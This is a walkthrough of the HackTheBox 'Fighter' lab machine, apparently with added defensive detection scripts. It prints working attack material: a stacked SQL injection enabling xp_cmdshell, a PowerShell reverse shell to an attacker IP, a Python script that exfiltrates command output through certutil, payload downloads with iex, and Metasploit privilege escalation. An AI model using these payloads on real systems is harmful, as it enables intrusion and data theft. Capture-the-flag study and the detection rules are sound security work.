Fighter is a very hard box. The topics it covers include subdomain enumeration, SQL injection, command execution through SQL Server, Juicy Potato privilege escalation, reverse engineering, and more. Anyone interested can practise it on HackTheBox.
Walkthrough mind map (figure)
0x01 Reconnaissance
Port scanning
First, scan the target's ports with nmap:
nmap -Pn -p- -sV -sC -A 10.10.10.72 -oA nmap_Fighter
The scan shows that only port 80 is open.
Port 80
Visiting it shows a cover image of the game "Street Fighter".
Directory brute-forcing the site with gobuster turns up no sensitive directories:
gobuster dir -u http://10.10.10.72 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Subdomain enumeration
While viewing the page we noticed the domain streetfighterclub.htb, so we suspected that subdomains might exist.
Edit the hosts file so the domain resolves:
vim /etc/hosts
# configuration
10.10.10.72 streetfighterclub.htb
Fuzzing virtual hosts with wfuzz reveals the members subdomain, which we also add to the hosts file:
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u streetfighterclub.htb -H "Host: FUZZ.streetfighterclub.htb" --hw 717
Directory brute-forcing the members subdomain with gobuster reveals the /old directory:
gobuster dir -u http://members.streetfighterclub.htb -w /usr/share/wordlists/dirb/big.txt
Brute-forcing files in that directory with gobuster reveals login.asp:
gobuster dir -u http://members.streetfighterclub.htb/old -w /usr/share/wordlists/dirb/big.txt -x asp,aspx
Visiting that file shows a user login page.
0x02 Foothold [sqlserv]
SQL injection
Attempt a login, intercept the request with Burp Suite, and forward it to Repeater for testing.
Adding a single quote to the admin and password parameters returns 302, while adding a single quote to the logintype parameter returns 500, which suggests that logintype may be injectable.
However, when I tried to inject, the target's responses did not match what I expected.
The reason was that the remember me option had not been ticked during login. After enabling it and injecting again, we successfully retrieved the value of the email parameter, which base64-decodes to admin@nowhere.com, confirming the SQL injection vulnerability.
sqlmap, however, cannot extract any data, so manual injection is still required.
Command execution
Here the parameter is passed to a stored procedure and must be a constant or a variable, so the usual UNION-based and blind techniques cannot be used; stacked queries, however, still work, and in this situation the application handles neither critical information nor higher-privileged users. We therefore change approach: since the scripts are ASP.NET, the database is very likely SQL Server, and we can use SQL Server's built-in xp_cmdshell procedure for command execution.
Reference: https://www.tarlogic.com/blog/red-team-tales-0x01/
First, enable xp_cmdshell:
EXEC sp_configure 'show advanced options', 1; -- enable advanced options
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'xP_cmDsHell', 1; -- enable xp_cmdshell
RECONFIGURE WITH OVERRIDE;
Create a temporary table #xxx:
drop table #xxx; -- drop table #xxx
create table #xxx (out varchar(8000)); -- create table #xxx
Insert into table #xxx the output of xp_cmdshell running the reverse shell command:
Insert into #xxx (out) execute xp_CmDShell 'c:\WinDOWS\SYSWoW64\winDoWSpOwERsHEll\V1.0\PoWerShell.EXE "
$client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.17\",80);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"^> \";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()
};
$client.Close()"'; -- the PowerShell reverse shell command is written here and executed through xp_cmdshell
EXEC sp_configure 'xp_cmDsHeLl', 0; -- disable xp_cmdshell
RECONFIGURE WITH OVERRIDE;
After tidying up, the complete statement is as follows:
1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDsHell', 1;RECONFIGURE WITH OVERRIDE;drop table #xxx;create table #xxx (out varchar(8000));Insert into #xxx (out) execute xp_CmDShell 'c:\WinDOWS\SYSWoW64\winDoWSpOwERsHEll\V1.0\PoWerShell.EXE "$client = New-Object System.Net.Sockets.TCPClient("10.10.14.17",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "^> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"';EXEC sp_configure 'xp_cmDsHeLl', 0;RECONFIGURE WITH OVERRIDE;
Listen on port 80 locally:
nc -nvlp 80
URL-encode the injection payload and send it in the HTTP login request:
POST /old/verify.asp HTTP/1.1
Host: members.streetfighterclub.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://members.streetfighterclub.htb
Connection: close
Referer: http://members.streetfighterclub.htb/old/login.asp
Cookie: ASPSESSIONIDQCTBSqqR=NMDOMHPALLEHCPAAIMOPNKHL
Upgrade-Insecure-Requests: 1

username=admin&password=admin&logintype=%31%3b%45%58%45%43%20%73%70%5f%63%6f%6e%66%69%67%75%72%65%20%27%73%68%6f%77%20%61%64%76%61%6e%63%65%64%20%6f%70%74%69%6f%6e%73%27%2c%20%31%3b%52%45%43%4f%4e%46%49%47%55%52%45%20%57%49%54%48%20%4f%56%45%52%52%49%44%45%3b%45%58%45%43%20%73%70%5f%63%6f%6e%66%69%67%75%72%65%20%27%78%50%5f%63%6d%44%73%48%65%6c%6c%27%2c%20%31%3b%52%45%43%4f%4e%46%49%47%55%52%45%20%57%49%54%48%20%4f%56%45%52%52%49%44%45%3b%64%72%6f%70%20%74%61%62%6c%65%20%23%78%78%78%3b%63%72%65%61%74%65%20%74%61%62%6c%65%20%23%78%78%78%20%28%6f%75%74%20%76%61%72%63%68%61%72%28%38%30%30%30%29%29%3b%49%6e%73%65%72%74%20%69%6e%74%6f%20%23%78%78%78%20%28%6f%75%74%29%20%65%78%65%63%75%74%65%20%78%70%5f%43%6d%44%53%68%65%6c%6c%20%27%63%3a%5c%57%69%6e%44%4f%57%53%5c%53%59%53%57%6f%57%36%34%5c%77%69%6e%44%6f%57%53%70%4f%77%45%52%73%48%45%6c%6c%5c%56%31%2e%30%5c%50%6f%57%65%72%53%68%65%6c%6c%2e%45%58%45%20%22%24%63%6c%69%65%6e%74%20%3d%20%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%53%6f%63%6b%65%74%73%2e%54%43%50%43%6c%69%65%6e%74%28%5c%22%31%30%2e%31%30%2e%31%34%2e%33%5c%22%2c%38%30%29%3b%24%73%74%72%65%61%6d%20%3d%20%24%63%6c%69%65%6e%74%2e%47%65%74%53%74%72%65%61%6d%28%29%3b%5b%62%79%74%65%5b%5d%5d%24%62%79%74%65%73%20%3d%20%30%2e%2e%36%35%35%33%35%7c%25%7b%30%7d%3b%77%68%69%6c%65%28%28%24%69%20%3d%20%24%73%74%72%65%61%6d%2e%52%65%61%64%28%24%62%79%74%65%73%2c%20%30%2c%20%24%62%79%74%65%73%2e%4c%65%6e%67%74%68%29%29%20%2d%6e%65%20%30%29%7b%3b%24%64%61%74%61%20%3d%20%28%4e%65%77%2d%4f%62%6a%65%63%74%20%2d%54%79%70%65%4e%61%6d%65%20%53%79%73%74%65%6d%2e%54%65%78%74%2e%41%53%43%49%49%45%6e%63%6f%64%69%6e%67%29%2e%47%65%74%53%74%72%69%6e%67%28%24%62%79%74%65%73%2c%30%2c%20%24%69%29%3b%24%73%65%6e%64%62%61%63%6b%20%3d%20%28%69%65%78%20%24%64%61%74%61%20%32%3e%26%31%20%7c%20%4f%75%74%2d%53%74%72%69%6e%67%20%29%3b%24%73%65%6e%64%62%61%63%6b%32%20%3d%20%24%73%65%6e%64%62%61%63%6b%20%2b%20%5c%22%50%53%20%5c%22%20%2b%20%28%70%77%64%29%2e%50%61%74%68%20%2b%20%5c%22%5e%3e%20%5c%22%3b%24%73%65%6e%64%62%79%74%65%20%3d%20%28%5b%74%65%78%74%2e%65%6e%63%6f%64%69%6e%67%5d%3a%3a%41%53%43%49%49%29%2e%47%65%74%42%79%74%65%73%28%24%73%65%6e%64%62%61%63%6b%32%29%3b%24%73%74%72%65%61%6d%2e%57%72%69%74%65%28%24%73%65%6e%64%62%79%74%65%2c%30%2c%24%73%65%6e%64%62%79%74%65%2e%4c%65%6e%67%74%68%29%3b%24%73%74%72%65%61%6d%2e%46%6c%75%73%68%28%29%7d%3b%24%63%6c%69%65%6e%74%2e%43%6c%6f%73%65%28%29%22%27%3b%45%58%45%43%20%73%70%5f%63%6f%6e%66%69%67%75%72%65%20%27%78%70%5f%63%6d%44%73%48%65%4c%6c%27%2c%20%30%3b%52%45%43%4f%4e%46%49%47%55%52%45%20%57%49%54%48%20%4f%56%45%52%52%49%44%45%3b&rememberme=ON&B1=LogIn
We successfully receive a reverse shell.
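The request above illustrates two things a web application firewall or log reviewer has to cope with: the payload is URL-encoded, and the dangerous keywords are case-mangled ('xP_cmDsHell', 'xp_CmDShell'). Neither survives a decoder that normalises both. The following Python check is an added example written for this page, not code from the original writeup or from the tarlogic post: it decodes a form-encoded login body once per parameter and reports which parameters carry sp_configure, xp_cmdshell, RECONFIGURE or a stacked statement. The two sample bodies are constructed for the example and only resemble the request above; the rule names are my own.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Indicators of the stacked-query pattern used against verify.asp: configuration flips,
# xp_cmdshell calls, and a second statement following a ';'.
INDICATORS = {
    "sp_configure": re.compile(r"\bsp_configure\b", re.IGNORECASE),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.IGNORECASE),
    "reconfigure": re.compile(r"\breconfigure\b", re.IGNORECASE),
    "stacked_statement": re.compile(r";\s*(?:exec|execute|drop|create|insert|declare)\b", re.IGNORECASE),
}


def inspect_form_body(body: str) -> dict:
    """Decode a form-encoded body and map each parameter to the indicators found in it.

    parse_qs already URL-decodes every value; the extra unquote_plus pass catches
    double-encoded payloads. Matching is case-insensitive, so mixed-case keywords
    such as 'xP_cmDsHell' are treated exactly like 'xp_cmdshell'.
    """
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            decoded = unquote_plus(value)
            hits = sorted(label for label, rx in INDICATORS.items() if rx.search(decoded))
            if hits:
                findings[name] = hits
    return findings


# Constructed sample bodies (shortened stand-ins for the captured request above).
SUSPICIOUS_BODY = (
    "username=admin&password=admin"
    "&logintype=1%3bEXEC%20sp_configure%20%27xP_cmDsHell%27%2c%201%3b"
    "RECONFIGURE%20WITH%20OVERRIDE%3bInsert%20into%20%23xxx%20(out)%20execute%20xp_CmDShell%20%27whoami%27%3b"
    "&rememberme=ON&B1=LogIn"
)
BENIGN_BODY = "username=ryu&password=hadouken&logintype=1&rememberme=ON&B1=LogIn"

if __name__ == "__main__":
    for label, body in (("suspicious", SUSPICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_form_body(body))
```

The point of decoding per parameter rather than scanning the raw body is that the raw body of the captured request contains no readable keyword at all; only the decoded logintype value does. A real deployment would feed the same function from the web server's request log or a WAF hook and alert on any non-empty result for a login endpoint.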
Once the injection mechanism is understood, we can also write a Python script that gives us an interactive shell directly:
import sys
import requests
import threading
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer

query_id = 0


def decode(data):
    # certutil on the target fetches http://10.10.14.17/<base64 output>; decode that path
    try:
        decoded_data = base64.b64decode(data)
    except Exception:
        return '[-] decoding error'
    return decoded_data.decode('utf8', errors='ignore')


def get_command():
    try:
        cmd = input(':\\> ')
        t = threading.Thread(target=send_command, args=(cmd,))
        t.start()
    except (EOFError, KeyboardInterrupt):
        sys.exit(0)


def send_command(cmd):
    # Stacked query: run the command with xp_cmdshell, base64-encode its output,
    # and make the target fetch http://10.10.14.17/<base64> with certutil.
    payload = "2;"
    payload += "declare @r varchar(6120),@cmdOutput varchar(6120);"
    payload += "declare @res TABLE(line varchar(max));"
    payload += "insert into @res exec Xp_cmdshell '%s';"
    payload += "set @cmdOutput=(SELECT CAST((select stuff((select cast(char(10) as varchar(max)) + line FROM @res for xml path('')), 1, 1, '')) as varbinary(max)) FOR XML PATH(''), BINARY BASE64);"
    payload += "set @r=concat('certutil -urlcache -f http://10.10.14.17/',@cmdOutput);"
    payload += "exec Xp_cmdshell @r;"
    payload += "--"
    # Data for login
    login = {
        'B1': 'LogIn',
        # 'logintype': "1 AND ISNULL(ASCII(SUBSTRING((SELECT @@version LIMIT 0,1)),"+str(limit)+",1)),0)>"+str(char),
        # the command is quoted as a T-SQL string literal, so single quotes are doubled
        'logintype': payload % cmd.replace("'", "''"),
        'username': "admin",
        'rememberme': 'ON',
        'password': "admin",
    }
    requests.post("http://members.streetfighterclub.htb/old/verify.asp", data=login)


class MyServer(HTTPServer):
    def server_activate(self):
        # get first command
        get_command()
        HTTPServer.server_activate(self)


class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
    def log_request(self, *args, **kwargs):
        return

    def log_message(self, *args, **kwargs):
        return

    def do_GET(self):
        global query_id
        self.send_error(404)
        # certutil sends 2 requests each time
        if query_id % 2 == 0:
            output = self.path
            # if there is command output, decode it!
            if output != '/':
                print(decode(output[1:]))
            # get next command
            get_command()
        query_id += 1


if __name__ == '__main__':
    # Fake server behaviour
    handler = SimpleHTTPRequestHandler
    handler.server_version = 'nginx'
    handler.sys_version = ''
    handler.error_message_format = 'not found'
    # Add SSL support if you wanna be a ninja!
    httpd = MyServer(('0.0.0.0', 80), handler)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
0x03 Privilege escalation [system]
Looking for kernel exploits
Checking the system information: the operating system is Windows Server 2012 with several patches installed:
systeminfo
Copying the output to systeminfo.txt and running Windows-Exploit-Suggester shows that kernel exploits such as ms16-075 could be used for privilege escalation:
python windows-exploit-suggester.py --database 2021-05-18-mssb.xls --systeminfo systeminfo.txt
At the same time, checking the firewall configuration shows that the firewall is enabled and only port 80 is allowed for communication:
netsh firewall show config
Juicy Potato privilege escalation
Try Juicy Potato to get around the firewall and escalate privileges. Upload JuicyPotato.exe to the target:
certutil.exe -urlcache -f http://10.10.14.17/JuicyPotato.exe C:\windows\system32\spool\drivers\color\JuicyPotato.exe
Append the reverse shell payload to the end of the nishang script Invoke-PowerShellTcp.ps1:
cp /root/Desktop/nishang/Shells/Invoke-PowerShellTcp.ps1 .
## configuration
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.17 -Port 443
Listen on port 443 locally:
nc -nvlp 443
Create a bat file that launches the reverse shell:
cmd /c "echo powershell iex(new-object net.webclient).downloadstring('http://10.10.14.17/Invoke-PowerShellTcp.ps1') > mac.bat"
Look up a CLSID in the Juicy Potato reference; we can use the CLSID of the TrustedInstaller service on Windows Server 2012: {8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
Reference: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2012_Datacenter
C:\windows\system32\spool\drivers\color\JuicyPotato.exe -p C:\windows\system32\spool\drivers\color\mac.bat -l 1337 -t * -c {8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
But we did not receive a reverse shell. Next, try nps_payload to build an XML file containing the payload so that the target's built-in msbuild can execute it. Note that this script has to be run with python2; otherwise it will not work.
Download: https://github.com/trustedsec/nps_payload
The script, however, seems to support msf only.
python2 nps_payload.py
Use msf to listen on port 443:
msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost tun0
msf > set lport 443
msf > run -j
Upload the newly generated XML file containing the payload and place it in a temporary location:
certutil.exe -urlcache -f http://10.10.14.17/msbuild_nps.xml C:\windows\system32\spool\drivers\color\msbuild_nps.xml
Run the payload with the target's built-in msbuild.exe:
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe C:\windows\system32\spool\drivers\color\msbuild_nps.xml
We get a meterpreter session back, but the privileges are still sqlserv: the Juicy Potato attempt failed.
For a stable shell, migrate into the x64 sqlservr process:
meterpreter > ps
meterpreter > migrate 1140
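Every step of this chain so far uses binaries that ship with Windows: certutil -urlcache -f pulls tools over port 80, the one port the firewall allows, and msbuild.exe runs a project file from the world-writable spool\drivers\color directory. That makes process-creation logging (Sysmon event 1 or Security event 4688 with command-line auditing) the natural place to catch it. The following Python detection is an added example for this page, not code from the original writeup: it parses a few constructed process-creation records and applies two rules, one for certutil used as a downloader and one for msbuild.exe building from a staging directory or a bare .xml project. The record format, the timestamps, the user names and the benign look-alike events are all assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    timestamp: str
    user: str
    image: str
    command_line: str


# Constructed records in a simple "timestamp|user|image|command line" form.
# The first two mirror the chain in the writeup; the last two are benign look-alikes.
SAMPLE_LOG = r"""
2021-05-18T10:01:02Z|FIGHTER\sqlserv|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -f http://10.10.14.17/JuicyPotato.exe C:\windows\system32\spool\drivers\color\JuicyPotato.exe
2021-05-18T10:03:15Z|FIGHTER\sqlserv|C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|msbuild.exe C:\windows\system32\spool\drivers\color\msbuild_nps.xml
2021-05-18T10:05:00Z|FIGHTER\Administrator|C:\Windows\System32\certutil.exe|certutil.exe -verify -urlfetch cert.cer
2021-05-18T10:06:30Z|FIGHTER\devbuild|C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|msbuild.exe C:\src\app\app.csproj
"""

# certutil used as a downloader: "-urlcache [options] -f <http(s) url>"
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache(?:\s+\S+)*?\s+-f\s+\S*https?://", re.IGNORECASE)

# Directories a low-privileged account can write to and that are commonly used for staging.
WRITABLE_STAGING = (r"\spool\drivers\color", r"\windows\temp", r"\users\public", r"\appdata\local\temp")


def parse_events(log_text: str) -> List[ProcEvent]:
    """Split the constructed record format into ProcEvent objects."""
    events = []
    for line in log_text.strip().splitlines():
        ts, user, image, cmdline = line.split("|", 3)
        events.append(ProcEvent(ts, user, image, cmdline))
    return events


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    hits = []
    image = ev.image.lower()
    cmd = ev.command_line.lower()
    if image.endswith("certutil.exe") and CERTUTIL_DOWNLOAD.search(cmd):
        hits.append("certutil_download")
    if image.endswith("msbuild.exe"):
        staged = any(d in cmd for d in WRITABLE_STAGING)
        # a plain .xml project (rather than .csproj/.proj/.sln) is the nps_payload / inline-task pattern
        if staged or re.search(r"\S+\.xml\b", cmd):
            hits.append("msbuild_untrusted_project")
    return hits


def detect(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (timestamp, user, rule) for every matching event, in log order."""
    alerts = []
    for ev in parse_events(log_text):
        for rule in classify(ev):
            alerts.append((ev.timestamp, ev.user, rule))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

Both alerts here come from the same low-privileged service account within a couple of minutes; correlating the download rule with the msbuild rule on the same user is what turns two medium-severity signals into a high-confidence one, and the firewall rule that only allows port 80 does not change the picture, since that is exactly the port certutil used.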
Capcom service privilege escalation
Listing the services from the command line shows no service that could be used for privilege escalation:
msf > shell
shell > wmic service where started=true get name,startname
But after some research we found that "Street Fighter" has a vulnerable service called Capcom; querying the service confirms that it is running:
shell > sc query capcom
Using the Capcom exploit to escalate privileges, however, reports failure:
msf > use exploit/windows/local/capcom_sys_exec
msf > set lhost tun0
msf > set lport 443
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > set session 1
msf > run
We need to edit the corresponding exploit module in msf:
cd /usr/share/metasploit-framework/modules/exploits/windows/local
ls
vim /usr/share/metasploit-framework/modules/exploits/windows/local/capcom_sys_exec.rb
Comment out its check statement.
Reload the modules and set the target:
msf > reload
...
msf > run
After the exploit succeeds we have SYSTEM privileges; look for the flags on the desktops of the user decoder and of the Administrator:
dir c:\users\decoder\Desktop
type c:\users\decoder\Desktop\user.txt
We find the first flag on the user's desktop, but the Administrator's desktop only contains root.exe and checkdll.dll, and running root.exe asks for a password.
0x04 Reverse engineering for the flag
Reverse analysis
First, download root.exe and checkdll.dll to the local machine:
meterpreter > cd c:\\Users\\Administrator\\Desktop
meterpreter > pwd
meterpreter > download root.exe /root/hackthebox/Machines/Fighter
meterpreter > download checkdll.dll /root/hackthebox/Machines/Fighter
We infer that root.exe relies on checkdll.dll to do the decryption, so checkdll.dll is the file to reverse. In IDA, press Shift+F12 to open the Strings window.
Click Fm`fEhOl}h to jump to where it is used.
Then follow check+8: the DLL XORs each character of the variable Fm`fEhOl}h with 9, so XORing each byte of Fm`fEhOl}h with 9 gives us the password.
Password cracking
Based on this, we can write a Python script to recover it:
# XOR every character of the obfuscated string with 9, as check+8 in checkdll.dll does
for i in "Fm`fEhOl}h":
    a = ord(i) ^ ord('\x09')
    result = chr(a)
    print(result, end='')
print()
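The script above assumes the XOR key (9) has already been read off the disassembly. As an added example that is not from the original writeup, the following Python generalises it: xor_decode applies any single-byte key, and candidate_keys tries all 256 keys and keeps those whose output is purely alphabetic, which narrows an unknown key down to a handful of candidates an analyst can eyeball. The constant is the string from checkdll.dll; the function names are my own.

```python
import string

# The obfuscated constant found in checkdll.dll's Strings window.
OBFUSCATED = "Fm`fEhOl}h"


def xor_decode(obfuscated: str, key: int) -> str:
    """XOR every character with a single-byte key. XOR is its own inverse,
    so the same call turns the password back into the stored constant."""
    return "".join(chr(ord(c) ^ key) for c in obfuscated)


def candidate_keys(obfuscated: str, alphabet: str = string.ascii_letters) -> list:
    """Brute-force the key: keep every key whose output consists only of
    characters from the given alphabet (letters by default, since a password
    check constant is usually printable)."""
    return [k for k in range(256)
            if all(ch in alphabet for ch in xor_decode(obfuscated, k))]


if __name__ == "__main__":
    for k in candidate_keys(OBFUSCATED):
        print(f"key 0x{k:02x}: {xor_decode(OBFUSCATED, k)}")
```

Several keys produce all-letter output, so the brute force does not pick the answer on its own; it reduces the search to a short list in which the key 9 read from the disassembly and its output OdioLaFeta stand out as the only pronounceable candidate.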
We get the password OdioLaFeta; try running root.exe with it:
root.exe OdioLaFeta
After entering the password we get the second flag.
Summary:
The whole box revolves around Street Fighter. After finding nothing exploitable on the main site, we found its domain name in the page, discovered the members subdomain through subdomain enumeration, and a directory scan with gobuster revealed a user login page in which we found a SQL injection vulnerability. Since the site is written in ASP.NET we guessed that the database is SQL Server; once SQL Server's built-in xp_cmdshell is enabled it can run system commands, which gave us a user-level shell. On the box, after some information gathering we tried Juicy Potato for privilege escalation, and at the same time found that the firewall was enabled with only port 80 open. After the Juicy Potato attempt failed we looked for exploitable system services and found that the Capcom service that ships with Street Fighter has a privilege escalation vulnerability; the Capcom exploit module bundled with msf gave us SYSTEM. Although we got the first flag on the user's desktop, we did not get the second one: the Administrator's desktop only held root.exe and checkdll.dll. Reversing checkdll.dll in IDA revealed how the password is derived, and a script recovers it. Finally, running root.exe and entering the password yields the second flag.